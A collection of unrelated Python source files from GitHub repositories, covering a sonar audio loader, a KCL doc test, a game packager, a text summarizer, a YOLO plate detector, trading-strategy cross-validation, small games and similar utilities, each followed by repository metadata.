for cls_folder in class_folders:
runfiles = os.listdir(os.path.join(input_db_path, cls_folder))
if not runfiles: # No files found inside the class folder
if verbose:
print('Empty directory %s' % cls_folder)
continue
if verbose:
print('Reading %s' % cls_folder)
runfiles = os.listdir(os.path.join(input_db_path, cls_folder))
runpaths = [os.path.join(input_db_path, cls_folder, runfile)
for runfile in runfiles]
runfiles = [runfile.replace('.wav', '') for runfile in runfiles]
audio_data = [read_audio_file(runpath) for runpath in runpaths]
raw_data[cls_folder] = {
runfile: {'signal': signal, 'fs': fs}
for runfile, (signal, fs) in zip(runfiles, audio_data)
}
return SonarDict(raw_data)
# class RunRecord(dict):
# """
# Basic dicionary for storing the runs
# binding the data with its respective metadata(sample rate)
# This wrapper was made to standardize the keynames.
# """
# def __init__(self, signal, fs):
# self.__dict__['signal'] = signal
# self.__dict__['fs'] = fs
# def __getitem__(self , k):
# return self.__dict__[k]
class SonarDict(dict):
"""
Wrapper for easy application of preprocessing functions
"""
def __init__(self, raw_data):
super(SonarDict, self).__init__(raw_data)
@staticmethod
def from_hdf5(filepath):
f = h5py.File(filepath, 'r')
raw_data = SonarDict.__level_from_hdf5(f)
f.close()
return SonarDict(raw_data)
@staticmethod
def __level_from_hdf5(group_level):
level_dict = dict()
for key in group_level.keys():
if isinstance(group_level[key], h5py._hl.group.Group):
level_dict[key] = SonarDict.__level_from_hdf5(group_level[key])
elif isinstance(group_level[key], h5py._hl.dataset.Dataset):
# if isinstance(group_level[key].dtype, 'float64')
level_dict[key] = group_level[key][()]
else:
raise ValueError
return level_dict
def to_hdf5(self, filepath):
f = h5py.File(filepath, 'w')
SonarDict.__level_to_hdf5(self, f, '')
f.close()
@staticmethod
def __level_to_hdf5(dictionary_level, f, dpath):
for key in dictionary_level.keys():
ndpath = dpath + '/%s' % key
if isinstance(dictionary_level[key], dict):
SonarDict.__level_to_hdf5(dictionary_level[key], f, ndpath)
else:
if isinstance(dictionary_level[key], np.ndarray):
dtype = dictionary_level[key].dtype
else:
dtype = type(dictionary_level[key])
f.create_dataset(ndpath, data=dictionary_level[key], dtype=dtype)
def apply(self, fn,*args, **kwargs):
"""
Apply a function over each run of the dataset.
params:
fn: callable to be applied over the data. Receives at least
one parameter: dictionary (RunRecord)
args: optional params to fn
kwargs: optional named params to fn
return:
new SonarDict object with the processed data. The inner structure
of signal, sample_rate pair is mantained, which allows for chaining
several preprocessing steps.
"""
sonar_cp = self.copy()
return SonarDict({
cls_name: self._apply_on_class(cls_data, fn, *args, **kwargs)
for cls_name, cls_data in sonar_cp.items()
})
def _apply_on_class(self, cls_data, fn, *args, **kwargs):
"""
Apply a function over each run signal of a single class.
Auxiliary function for applying over the dataset
"""
return {
run_name: fn(raw_data, *args, **kwargs)
for run_name, raw_data in cls_data.items()
}
def read_audio_file(filepath):
signal, fs = sf.read(filepath)
return signal, fs
| pedrolisboa/poseidon | poseidon/io/offline.py | offline.py | py | 6,116 | python | en | code | 2 | github-code | 36 |
1947313325 | import unittest
import pathlib
import typing
import kclvm.compiler.parser.parser as parser
import kclvm.tools.docs.doc_parser as doc_parser
import kclvm.kcl.types.checker as type_checker
import kclvm.api.object as obj_pkg
import kclvm.tools.docs.model_pb2 as model
_DIR_PATH = pathlib.Path(__file__).parent.joinpath("doc_data") / "source_files"
def resolve(kcl_file: str) -> typing.List[model.SchemaDoc]:
prog = parser.LoadProgram(kcl_file)
type_checker.ResolveProgramImport(prog)
checker = type_checker.TypeChecker(prog, type_checker.CheckConfig())
checker.check_import(prog.MAIN_PKGPATH)
checker.init_global_types()
schemas = prog.pkgs[prog.MAIN_PKGPATH][0].GetSchemaList()
schema_docs: typing.List[model.SchemaDoc] = []
for schema in schemas:
schema_obj_type = checker.scope_map[prog.MAIN_PKGPATH].elems[schema.name].type
assert isinstance(schema_obj_type, obj_pkg.KCLSchemaDefTypeObject)
schema_docs.append(
doc_parser.SchemaDocParser(
schema=schema,
schema_type=schema_obj_type.schema_type,
root=prog.root,
).doc
)
return schema_docs
class KCLDocCheckerTest(unittest.TestCase):
def test_simple_case(self) -> None:
docs = resolve(_DIR_PATH / "simple.k")
assert len(docs) == 1
doc = docs[0]
assert doc.doc.startswith("Person is a simple schema")
assert doc.attributes[0].name == "name"
assert doc.attributes[0].type.type_str == "str"
assert doc.attributes[0].is_optional is False
assert doc.attributes[0].default_value == '"Default"'
assert doc.attributes[0].doc.startswith("A Normal attribute named 'name'")
assert doc.attributes[1].name == "age"
assert doc.attributes[1].type.type_str == "int"
assert doc.attributes[1].is_optional is True
assert doc.attributes[1].default_value == "18"
assert doc.attributes[1].doc.startswith("A Normal attribute named 'age'")
assert doc.examples.startswith("person = Person {")
if __name__ == "__main__":
unittest.main(verbosity=2)
| kcl-lang/kcl-py | test/test_units/test_kclvm/test_tools/test_doc/test_checker.py | test_checker.py | py | 2,149 | python | en | code | 8 | github-code | 36 |
15386994551 | #!/usr/bin/env python3
"""게임과 론처를 묶어서 새 앱 프로토콜 버전을 서명한 뒤 패키지로 생성한다."""
import argparse
import os
import os.path
import logging
import shutil
import tarfile
import tempfile
import zipfile
from zipfile import ZIP_DEFLATED
parser = argparse.ArgumentParser(description=__doc__.replace('\n', ' '))
parser.add_argument('out_dir')
parser.add_argument('platform', choices={'macOS', 'Windows', 'Linux'})
parser.add_argument('game_dir')
parser.add_argument('timestamp')
parser.add_argument(
'--verbose', '-v',
action='store_const', const=logging.DEBUG, default=logging.INFO,
)
def main() -> None:
args = parser.parse_args()
logging.basicConfig(level=args.verbose)
temp_dir = tempfile.mkdtemp()
for root in [args.game_dir]:
for name in os.listdir(root):
path = os.path.join(root, name)
tmppath = os.path.join(temp_dir, name)
if os.path.isdir(path):
if not os.path.isdir(tmppath): # skip duplicate dirs
shutil.copytree(path, tmppath)
else:
if not os.path.isfile(tmppath): # skip duplicate files
shutil.copy2(path, tmppath)
logging.info('Copy: %s -> %s', path, tmppath)
# 아카이브 생성
os.makedirs(args.out_dir, exist_ok=True)
if args.platform.lower() == 'macos':
archive_path = os.path.join(args.out_dir, 'macOS.tar.gz')
executable_path = os.path.join(
temp_dir,
'9c.app/Contents/MacOS/9c'
)
os.chmod(executable_path, 0o755)
with tarfile.open(archive_path, 'w:gz') as archive:
for arcname in os.listdir(temp_dir):
name = os.path.join(temp_dir, arcname)
archive.add(name, arcname=arcname)
logging.info('Added: %s <- %s', arcname, name)
elif args.platform.lower() == 'linux':
archive_path = os.path.join(args.out_dir, 'Linux.tar.gz')
executable_path = os.path.join(
temp_dir,
'9c'
)
os.chmod(executable_path, 0o755)
with tarfile.open(archive_path, 'w:gz') as archive:
for arcname in os.listdir(temp_dir):
name = os.path.join(temp_dir, arcname)
archive.add(name, arcname=arcname)
logging.info('Added: %s <- %s', arcname, name)
elif args.platform.lower() == 'windows':
archive_path = os.path.join(args.out_dir, 'Windows.zip')
with zipfile.ZipFile(archive_path, 'w', ZIP_DEFLATED) as archive:
basepath = os.path.abspath(temp_dir) + os.sep
for path, dirs, files in os.walk(temp_dir):
logging.debug('Walk: %r, %r, %r', path, dirs, files)
for name in files + dirs:
fullname = os.path.abspath(os.path.join(path, name))
assert fullname.startswith(basepath)
relname = fullname[len(basepath):]
archive.write(fullname, relname)
logging.info('Added: %s <- %s', relname, fullname)
else:
return parser.exit(1, f'unsupported platform: {args.platform}')
logging.info('Created an archive: %s', archive_path)
shutil.rmtree(temp_dir)
if __name__ == '__main__':
main()
| FioX0/PandoraReborn | tools/pack/pack.py | pack.py | py | 3,340 | python | en | code | 0 | github-code | 36 |
4130563060 | import os
import os.path
# example user input C:\Users\<yourownusername>\Desktop
while True:
dir = input('Input the path file:')
if dir == '': break
if os.path.isdir(dir):
file_types = {}
file_size = {}
for r,d,f in os.walk(dir):
for fi in f:
if fi[0] not in '.~':
f_parts = fi.split('.')
if len(f_parts)>1:
f_type = f_parts[-1]
file_types[f_type]=file_types.get(f_type,0)+1
for t in file_types:
print(t,'\t\t',file_types[t]) | AlexandrosPanag/My_Python_Projects | OS/OS_File_Format.py | OS_File_Format.py | py | 610 | python | en | code | 1 | github-code | 36 |
12087004714 | from sklearn.feature_extraction.text import TfidfVectorizer
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
import spacy,os
import argparse
import re
from tqdm import tqdm
from collections import OrderedDict
import string
import numpy as np
from spacy.lang.en import English
import time
nl = English()
import sys
import pandas as pd
repeat = 5
data = []
doc = []
l3 = []
summary = []
hypothesis = ""
word_count = []
pair_similarity = []
summary_string = []
def count_word(index):
global doc
Doc = nl(doc[index])
tokens = [t.text for t in Doc]
tokens = [t for t in tokens if len(t.translate(t.maketrans('', '', string.punctuation + string.whitespace))) > 0] # + string.digits
return len(tokens)
def store_word_count():
global word_count,doc
word_count = []
for i in range(0,len(doc)):
word_count.append(count_word(i))
def maximum(index, toPrint=0):
global summary, pair_similarity
length = len(summary)
if(length!=0):
max=0
for i in range(length):
a=pair_similarity[index][summary[i]]
if(a>max):
max=a
if toPrint:
print(str(summary[i])+" -> "+str(a))
return max
else:
return 0
def count_sum(summary):
sum=0
length = len(summary)
for i in range(length):
sum+=count_word(summary[i])
return sum
def mmr_sorted(lambda_, doc, length):
global word_count, pair_similarity, summary
#print('Inside MMR')
print(length)
l3 = []
vectorizer = TfidfVectorizer(smooth_idf=False)
X = vectorizer.fit_transform(doc)
y = X.toarray()
rows = y.shape[0]
cols = y.shape[1]
pair_similarity = []
for i in range(rows):
max=-1
pair_similarity.append([])
for j in range(rows):
if(j!=i):
a = np.sum(np.multiply(y[i],y[j]))
pair_similarity[-1].append(a)
if(a>max):
max=a
else:
pair_similarity[-1].append(1)
l3.append(max)
store_word_count()
l = len(doc)
count = 0
last = -1
summary = []
summary_word_count = 0
while(1):
if (summary_word_count < length):
max=-1
for i in range(l):
a = maximum(i)
mmrscore = lambda_*l3[i] - (1-lambda_)*a
if(mmrscore >= max):
max = mmrscore
ind = i
summary.append(ind)
summary_word_count += word_count[ind]
else:
#print('Bye')
break
def listToString():
global summary_string, word_count, hypothesis, summary, doc
summary_string = []
leng = 0
for i in summary:
if doc[i] not in summary_string:
summary_string.append(doc[i])
leng += word_count[i]
hypothesis = "".join(summary_string)
parser = argparse.ArgumentParser()
parser.add_argument('--data_path', default = 'data/text/', type = str, help = 'Folder containing textual data')
parser.add_argument('--summary_path', default = 'data/summaries/', type = str, help = 'Folder to store features of the textual data')
parser.add_argument('--length_file', default = 'data/length.txt', type = str, help = 'Path to file containing summary length')
args = parser.parse_args()
print('Generating summary in ...'+args.summary_path)
num_docs = len(os.listdir(args.data_path))
X1 = pd.read_csv(args.length_file, sep="\t", header=None)
for i in tqdm(range(0,num_docs)):
length1=X1[1][i]
#length2=X2[1][i]
doc = []
with open(os.path.join(args.data_path,X1[0][i]), 'r') as file:
for x in file:
if x != '\n':
doc.append(x)
lamda=0.6
#for j in lamda:
mmr_sorted(lamda,doc,length1)
listToString()
f= open(os.path.join(args.summary_path,X1[0][i]),"w+")
n = f.write(hypothesis)
f.close()
hypothesis=""
| Law-AI/summarization | extractive/MMR/MMR.py | MMR.py | py | 4,098 | python | en | code | 139 | github-code | 36 |
10156278888 | from turtle import Turtle
FONT = ("Courier", 24, "normal")
ALIGNMENT = "center"
class Scoreboard(Turtle):
def __init__(self):
super().__init__()
self.score = 0
self.level = 1
self.penup()
self.hideturtle()
self.color("white")
with open("high_score.txt", "r") as score:
self.high_score = score.read()
self.update_score()
def increase_score(self):
self.clear()
self.score += 1
self.update_score()
def update_score(self):
self.goto(0, 250)
self.write(arg=f"Score: {self.score} Level: {self.level} High Score: {self.high_score}",
align=ALIGNMENT,
font=FONT)
def game_over(self, outcome):
self.goto(0, 0)
if outcome == "Win":
message = "YOU WIN"
elif outcome == "Lose":
message = "GAME OVER"
self.write(arg=f"{message}", align=ALIGNMENT, font=FONT)
def update_high_score(self):
with open("high_score.txt", "w") as score:
score.write(f"{self.score}")
| vaughnhamill/breakout-game | scoreboard.py | scoreboard.py | py | 1,106 | python | en | code | 0 | github-code | 36 |
71673325543 | import gc
import pandas as pd
import numpy as np
from .order import simulate_lqe_model
from .order import (
simulate_batch_lqe_model,
simulate_batch_from_order_func_low_param,
)
from .strategies.components.statistics import (
score_results, return_results, _weighted_average
)
def pairs_cross_validator(
close_train_sets:list, open_train_sets:list, params:dict, commission:float=0.0008,
slippage:float=0.0010, burnin:int=500, cash:int=100_000, order_size:float=0.10,
freq:str=None, hedge:str="dollar", transformation:str="default", model='LQE',
rf=0.00, standard_score='zscore', seed=False,
) -> pd.DataFrame:
"""Train param batch against cross-validated training (and validation) data.
Notes
-----
For detailed documentation see `optimizers.simulations.order.simulate_batch_from_order_func`
Parameters
----------
close_train_set : list
open_train_sets : list
params : dict
commission : float, optional
slippage : float, optional
burnin : int, optional
cash : int, optional
order_size : float, optional
freq : None or str, optional
hedge : str, optional
close_validation_sets : None or list, optional
transformation : str, optional
seed_filter : str, optional
Returns
-------
DataFrame
Return a dataframe indexed to parameter combinations with a
series of statistics for evaluating simulation performance.
See Also
--------
* `optimizers.simulations.order.simulate_batch_from_order_func`
* `optimizers.simulations.statistics._weighted_average`
* `optimizers.simulations.statistics._calculate_mse`
* `vbt.Portfolio`
"""
fitness_results = []
test_data = zip(close_train_sets, open_train_sets)
for idx, (close_prices, open_prices) in enumerate(test_data):
if model == 'LQE':
if (seed and idx == 0) or not seed:
seed_set = np.array([])
elif seed and idx != 0:
seed_set = pd.concat(close_train_sets[:idx]).values
df = simulate_batch_lqe_model(
close_prices, open_prices, params,
burnin=burnin,
cash=cash,
commission=commission,
slippage=slippage,
order_size=order_size,
freq=freq,
hedge=hedge,
transformation=transformation,
rf=rf,
standard_score=standard_score,
seed=seed_set
)
fitness_results.append(df)
gc.collect()
elif model == 'LQE2':
df = simulate_batch_from_order_func_low_param(
close_prices, open_prices, params,
burnin=burnin,
cash=cash,
commission=commission,
slippage=slippage,
order_size=order_size,
freq=freq,
hedge=hedge,
model=transformation,
rf=rf,
)
fitness_results.append(df)
gc.collect()
else:
raise ValueError(f'No {model} model found in simulations')
# Calculate mean results for each param across folds
train_cv_results = pd.concat(fitness_results, axis=1)
train_cv_results = train_cv_results.fillna(0)
weighted_wr = _weighted_average(train_cv_results)
mean_results = train_cv_results.groupby(by=train_cv_results.columns, axis=1).mean()
return pd.concat([mean_results, weighted_wr], axis=1)
def testParams(
close_test_sets:list, open_test_sets:list, period:float, upper:float,
lower:float, exit:float, delta:float=1e-5, vt:float=1.0, burnin:int=500,
transformation:str="default", cash:int=100_000, commission:float=0.0008,
slippage:float=0.0010, order_size:float=0.10, freq:None or str=None,
hedge:str="dollar",
):
"""Test unique parameter set against multi-fold test set data
Notes
-----
For detailed documentation see `optimizers.simulations._order.simulate_batch_from_order_func`
Parameters
----------
close_test_set : list
open_test_sets : list
period : float
upper : float
lower : float
exit : float
delta : float, optional
vt : float, optional
burnin : int, optional
transformation : str, optional
commission : float, optional
slippage : float, optional
burnin : int, optional
cash : int, optional
order_size : float, optional
freq : None or str, optional
hedge : str, optional
Returns
-------
tuple
Returns a tuple of pandas Series with relevant statistics for
evaluation
See Also
--------
`optimizers.simulations._order.simulate_from_order_func`
`optimizers.simulations.statistics.score_results`
`optimizers.simulations.statistics.return_results`
`vbt.Portfolio`
"""
test_res = []
test_data = zip(close_test_sets, open_test_sets)
for close_prices, open_prices in test_data:
pf = simulate_lqe_model(
close_prices, open_prices,
period=period,
upper=upper,
lower=lower,
exit=exit,
delta=delta,
vt=vt,
burnin=burnin,
cash=cash,
commission=commission,
slippage=slippage,
order_size=order_size,
freq=freq,
hedge=hedge,
transformation=transformation,
)
test_res.append(pf)
# For some reason the pf object does not get collected normally
# As such we need to manual call `gc.collect` to prevent memory bloat
gc.collect()
wr = score_results(test_res)
total_return = return_results(test_res)
return wr, total_return
| jaythequant/VBToptimizers | optimizers/simulations/cv_orders.py | cv_orders.py | py | 5,840 | python | en | code | 2 | github-code | 36 |
11936036688 | from typing import Any, Optional, TYPE_CHECKING
import logging
from ..common.utils import deepmerge
from .execution_method import ExecutionMethod
from .aws_settings import INFRASTRUCTURE_TYPE_AWS, AwsSettings
if TYPE_CHECKING:
from ..models import (
Task,
TaskExecution
)
logger = logging.getLogger(__name__)
class AwsBaseExecutionMethod(ExecutionMethod):
def __init__(self, name: str,
task: Optional['Task'] = None,
task_execution: Optional['TaskExecution'] = None,
aws_settings: Optional[dict[str, Any]] = None) -> None:
super().__init__(name, task=task,
task_execution=task_execution)
if aws_settings is None:
self.aws_settings = self.merge_aws_settings(task=task,
task_execution=task_execution)
else:
self.aws_settings = AwsSettings.parse_obj(aws_settings)
@staticmethod
def merge_aws_settings(task: Optional['Task'],
task_execution: Optional['TaskExecution']) -> AwsSettings:
settings_to_merge: list[dict[str, Any]] = [ {} ]
if task:
if task.run_environment.aws_settings:
settings_to_merge.append(task.run_environment.aws_settings)
if task.infrastructure_settings and \
(task.infrastructure_type == INFRASTRUCTURE_TYPE_AWS):
settings_to_merge.append(task.infrastructure_settings)
if task_execution and task_execution.infrastructure_settings and \
(task_execution.infrastructure_type == INFRASTRUCTURE_TYPE_AWS):
settings_to_merge.append(task_execution.infrastructure_settings)
return AwsSettings.parse_obj(deepmerge(*settings_to_merge))
def compute_region(self) -> Optional[str]:
region = self.aws_settings.region
if (not region) and self.task:
infra = self.task.infrastructure_settings
if infra and (self.task.infrastructure_type == INFRASTRUCTURE_TYPE_AWS):
region = infra.get('region')
if (not region) and infra.get('network'):
region = infra['network'].get('region')
if not region:
run_environment = self.task.run_environment
re_aws_settings = run_environment.aws_settings
if re_aws_settings:
region = re_aws_settings.get('region')
if (not region) and re_aws_settings.get('network'):
region = re_aws_settings['network'].get('region')
return region
def enrich_task_settings(self) -> None:
if not self.task:
raise RuntimeError("enrich_task_settings(): No Task found")
aws_settings_dict = self.task.infrastructure_settings
if aws_settings_dict:
aws_settings = AwsSettings.parse_obj(aws_settings_dict)
aws_settings.update_derived_attrs(execution_method=self)
self.task.infrastructure_settings = deepmerge(
aws_settings_dict, aws_settings.dict())
# TODO: scheduling URLs
def enrich_task_execution_settings(self) -> None:
if not self.task_execution:
raise RuntimeError("enrich_task_execution_settings(): No Task Execution found")
aws_settings_dict = self.task_execution.infrastructure_settings
if aws_settings_dict:
aws_settings = AwsSettings.parse_obj(aws_settings_dict)
aws_settings.update_derived_attrs(execution_method=self)
self.task_execution.infrastructure_settings = deepmerge(
aws_settings_dict, aws_settings.dict())
| CloudReactor/task_manager | server/processes/execution_methods/aws_base_execution_method.py | aws_base_execution_method.py | py | 3,685 | python | en | code | 0 | github-code | 36 |
3219242168 | import sys
sys.path.append('../VQ-VAE')
from auto_encoder2 import VQ_CVAE
import argparse
from torch import optim
from torchvision import transforms
import fpa_dataset
parser = argparse.ArgumentParser(description='Train an autoencoder for hand depth image reconstruction')
parser.add_argument('-r', dest='dataset_root_folder', required=True, help='Root folder for dataset')
parser.add_argument('--split-filename', default='', help='Dataset split filename')
parser.add_argument('-e', dest='num_epochs', type=int, required=True,
help='Total number of epochs to train')
parser.add_argument('--use-cuda', dest='use_cuda', action='store_true', default=False,
help='Whether to use cuda for training')
parser.add_argument('-l', dest='epoch_log', type=int, default=10,
help='Total number of epochs to train')
parser.add_argument('--batch-size', type=int, default=1, help='Batch size')
args = parser.parse_args()
args.use_cuda = True
transform_depth = transforms.Compose([transforms.ToTensor()])
lr = 2e-4
d = 128
k = 256
num_channels_in = 1
num_channels_out = 1
model = VQ_CVAE(d=d, k=k, num_channels_in=num_channels_in, num_channels_out=num_channels_out)
if args.use_cuda:
model = model.cuda()
optimizer = optim.Adam(model.parameters(), lr=lr)
scheduler = optim.lr_scheduler.StepLR(optimizer, 10, 0.5)
train_loader = fpa_dataset.DataLoaderTracking(root_folder=args.dataset_root_folder,
type='train', transform_color=None,
transform_depth=transform_depth,
batch_size=args.batch_size,
split_filename=args.split_filename,)
for epoch_idx in range(args.num_epochs - 1):
epoch = epoch_idx + 1
continue_batch_end_ix = -1
for batch_idx, (data, _) in enumerate(train_loader):
if batch_idx < continue_batch_end_ix:
print('Continuing... {}/{}'.format(batch_idx, continue_batch_end_ix))
continue
optimizer.zero_grad()
if args.use_cuda:
data = data.cuda()
outputs = model(data)
loss = model.loss_function(data, *outputs)
loss.backward()
optimizer.step()
a = 0 | pauloabelha/handy | train_autoencoder.py | train_autoencoder.py | py | 2,275 | python | en | code | 2 | github-code | 36 |
16627028163 | #!/bin/python3
import sys
def isBalanced(s):
if(len(s)) == 0:
return True
pairing = {"{": "}", "(":")", "[":"]"}
first = s[0]
try:
match = pairing[first]
except:
return False
openings = 0;
for i in range(1, len(s)):
if s[i] == first:
openings += 1
elif s[i] == match and openings == 0:
return isBalanced(s[1:i]) and isBalanced(s[i+1:])
elif s[i] == match:
openings -= 1
return False
if __name__ == "__main__":
t = int(input().strip())
for a0 in range(t):
s = input().strip()
result = isBalanced(s)
if result:
print("YES")
else:
print("NO")
| mark-wiemer/hacker-rank | BalancedBrackets/balanced_brackets.py | balanced_brackets.py | py | 671 | python | en | code | 0 | github-code | 36 |
13988738028 | class Solution:
def twoSumLessThanK(self, A: List[int], K: int) -> int:
A.sort()
i = bisect_left(A, K)
if i == 0 and A[i] == K:
return -1
elif i == len(A) or A[i] > K:
i -= 1
ans = -1
for j in range(i, -1, -1):
target = K - A[j] - 1
l = bisect_right(A, target, hi=j)
if l == j:
l = j - 1
elif (A[l] > target and l > 0):
l -= 1
if 0 <= l < j and A[l] + A[j] < K:
ans = max(ans, A[l] + A[j])
return ans
| dariomx/topcoder-srm | leetcode/trd-pass/easy/two-sum-less-than-k/two-sum-less-than-k.py | two-sum-less-than-k.py | py | 593 | python | en | code | 0 | github-code | 36 |
40144939486 | from flask import request
from werkzeug.utils import secure_filename
from db import db
from models import Img
def upload_images(pic_list, private, user_id):
#import pdb; pdb.set_trace()
for pic in pic_list:
filename = secure_filename(pic.filename)
mimetype = pic.mimetype
if not filename or not mimetype or "image" not in str(mimetype):
return False
img = Img(img=pic.read(), user_id=user_id, private=private, name=filename, mimetype=mimetype)
db.session.add(img)
db.session.commit()
return True
| elmanreasat/imagipy | controllers/upload.py | upload.py | py | 573 | python | en | code | 0 | github-code | 36 |
26908641087 | import unittest
from models import UserTokens, UserDetails
class TokenTest(unittest.TestCase):
def test_user_token(self):
user='gbabun@gmail.com'
ud=UserDetails.gql('WHERE instapaper_account = :1' , user).get()
#self.assertTrue(ud is not None)
token=UserTokens()
#token.user_details=ud
token.put()
| bojanbabic/Instaright | backend/test/tokens_test.py | tokens_test.py | py | 312 | python | en | code | 1 | github-code | 36 |
33171162837 | import matplotlib.pyplot as plt
import cv2
import numpy as np
# from pyradar.classifiers.isodata import isodata_classification
from isodataclassifier import isodata_classification
def equalize_histogram(img, histogram, cfs):
"""
Equalize pixel values to [0:255].
"""
total_pixels = img.size
N, M = img.shape
min_value = img.min()
L = 256 # Number of levels of grey
cfs_min = cfs.min()
img_corrected = np.zeros_like(img)
corrected_values = np.zeros_like(histogram)
divisor = np.float32(total_pixels) - np.float32(cfs_min)
if not divisor: # this happens when the image has all the values equals
divisor = 1.0
factor = (np.float32(L) - 1.0) / divisor
corrected_values = ((np.float32(cfs) -
np.float32(cfs_min)) * factor).round()
img_copy = np.uint64(img - min_value)
img_corrected = corrected_values[img_copy]
return img_corrected
def equalization_using_histogram(img):
# Create histogram, bin edges and cumulative distributed function
max_value = img.max()
min_value = img.min()
assert min_value >= 0, \
"ERROR: equalization_using_histogram() img have negative values!"
start, stop, step = int(min_value), int(max_value + 2), 1
histogram, bin_edge = np.histogram(img, xrange(start, stop, step))
cfs = histogram.cumsum() # cumulative frencuency table
img_corrected = equalize_histogram(img, histogram, cfs)
return img_corrected
params = {"K": 100, "I" : 1000, "P" : 10, "THETA_M" : 10, "THETA_S" : 0.01,"THETA_C" : 8, "THETA_O" : 0.02}
img = cv2.imread('dataset/original/before.jpg',0)
# kernel = np.ones((5,5),np.uint8)
plt.imshow(img)
plt.show()
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(1,1))
# print('Before')
img = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel, iterations=7)
img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel, iterations=7)
# print('Operated Image')
#plt.imshow(img)
#plt.show()
# img = cv2.imread('dataset/after.jpg',0)
# # kernel = np.ones((5,5),np.uint8)
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(1,1))
# print('After')
# img = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel, iterations=7)
# img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel, iterations=7)
# print("After Operated Image")
# imgplot = plt.imshow(img)
# plt.show()
# run Isodata
class_image = isodata_classification(img, parameters=params)
# plt.imshow(class_image);
# plt.show()
# # equalize class image to 0:255
class_image_eq = equalization_using_histogram(class_image)
# # save it
save_image(IMG_DEST_DIR, "image_eq", image_eq)
# print("Equalized image classified using histogram 1")
# imgplot = plt.imshow(class_image_eq)
# plt.show()
# # also save original image
# image_eq = equalization_using_histogram(image)
# # save it
# print("Equalized image classified using histogram 2")
# #imgplot = plt.imshow(image_eq)
# #plt.show()
| sauravkarn541/morphological_operators | isodata.py | isodata.py | py | 2,932 | python | en | code | 0 | github-code | 36 |
34023408707 | import cv2
import os
from ultralytics import YOLO
from datetime import datetime, timedelta
# Load the YOLOv8 model
modelo_pt = r'Modelos\Deploys_Ultralytics_Hub\detector_de_placas_yolov8_nano.pt'
model = YOLO(f'{modelo_pt}')
# Open the video file
video_path = r"Video\Video_teste.mp4"
cap = cv2.VideoCapture(video_path)
# Certifique-se de que o diretório de saída existe, senão crie-o
save_path_cortadas = r"Resultado_de_dados\imagens_cortadas"
if not os.path.exists(save_path_cortadas):
os.makedirs(save_path_cortadas)
save_path_inteiras = r"Resultado_de_dados\imagens_inteiras"
if not os.path.exists(save_path_inteiras):
os.makedirs(save_path_inteiras)
# Defina manualmente o horário de início da gravação IMPORTANTISSIMO!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
start_time = datetime(2023, 10, 30, 17, 35, 9)
# Loop through the video frames
file_num = 0
unique_id = set()
# Define a nova largura e altura desejada
new_width, new_height = 1100, 600
while cap.isOpened():
# Read a frame from the video
success, frame = cap.read()
if success:
# Resize the frame to 640x640
frame = cv2.resize(frame, (new_width, new_height))
# Run YOLOv8 inference on the frame
results = model.track(frame, persist=True, conf=0.95, save_txt=True)
#results = model.predict(frame, conf=0.95, save_txt=True)
if results[0].boxes.id is not None:
boxes = results[0].boxes.xyxy.cpu().numpy().astype(int)
ids = results[0].boxes.id.cpu().numpy().astype(int)
for box, id in zip(boxes, ids):
int_id = int(id)
if int_id not in unique_id:
unique_id.add(int_id)
box = box[:4]
# Crop the image using the bounding box coordinates
cropped_img = frame[box[1]:box[3], box[0]:box[2]]
class_id = int(id)
# Calcular o horário de detecção somando os segundos desde o início do vídeo ao horário de início
seconds_elapsed = cap.get(cv2.CAP_PROP_POS_FRAMES) / cap.get(cv2.CAP_PROP_FPS)
detection_time = start_time + timedelta(seconds=seconds_elapsed)
# Salvar a imagem recortada com o horário relativo
filename = f"imagem_destacada_do_id_{int_id}_horario_{detection_time.strftime('%H-%M-%S')}.jpg"
filepath = os.path.join(save_path_cortadas, filename)
cv2.imwrite(filepath, cropped_img)
filename_inteira = f"foto_inteira_do_id_{int_id}_horario_{detection_time.strftime('%H-%M-%S')}.jpg"
filepath_inteira = os.path.join(save_path_inteiras, filename_inteira)
cv2.imwrite(filepath_inteira, frame)
frame = results[0].plot()
# Display the annotated frame
cv2.imshow(f"Detectando pelo modelo: {modelo_pt}", frame)
# Break the loop if 'q' is pressed
if cv2.waitKey(1) & 0xFF == ord("q"):
break
else:
# Break the loop if the end of the video is reached
break
# Release the video capture object and close the display window
cap.release()
cv2.destroyAllWindows() | DevJoaoPedroGiancoli/BrazilTrafficSignsDetector | Detector/detector_com_ids.py | detector_com_ids.py | py | 3,255 | python | pt | code | 0 | github-code | 36 |
1655512886 | import random
from turtle import Screen
from display import DisplaySet
from paddle import Paddle
from ball import Ball
from score import Score
import time
screen = Screen()
screen.title('PONG')
screen.bgcolor('black')
screen.setup(height=600, width=800)
screen.tracer(0)
set_game_field = DisplaySet()
game_on = True
ball = Ball()
score = Score()
score_p1 = Score()
score_p2 = Score()
paddle_1 = Paddle()
paddle_2 = Paddle()
paddle_1.paddle_position(-350)
score_p1.score_position(-120)
paddle_2.paddle_position(350)
score_p2.score_position(100)
screen.listen()
screen.onkey(paddle_1.paddle_up, 'q')
screen.onkey(paddle_1.paddle_down, 'a')
screen.onkey(paddle_2.paddle_up, 'Up')
screen.onkey(paddle_2.paddle_down, 'Down')
while game_on:
time.sleep(ball.ball_speed)
screen.update()
ball.ball_on_the_run()
tilt_angle = random.randrange(4, 8)
if ball.ycor() > 280 or ball.ycor() < -280:
new_angle = 360 - ball.heading()
ball.setheading(new_angle)
elif ball.distance(paddle_1) < 50 and ball.xcor() < -330:
new_angle = 360 - (ball.heading() * 2 - tilt_angle)
ball.setheading(new_angle)
elif ball.distance(paddle_2) < 50 and ball.xcor() > 330:
new_angle = 180 - (ball.heading() * 2 + tilt_angle)
ball.setheading(new_angle)
elif ball.xcor() > 370:
ball.p1_score_set()
score_p1.score_count()
elif ball.xcor() < -370:
ball.p2_score_set()
score_p2.score_count()
if score_p1.score == 10 or score_p2.score == 10:
score.end_game()
game_on = False
screen.exitonclick()
| wojtekgajda/pong_game | main.py | main.py | py | 1,600 | python | en | code | 0 | github-code | 36 |
29295752629 | def multiply(*numbers): # use Asterik to make it a tupple , tuples are iterable
total = 1
for number in numbers:
total *= number
return total
print("start")
print(multiply(2, 3, 5, 6))
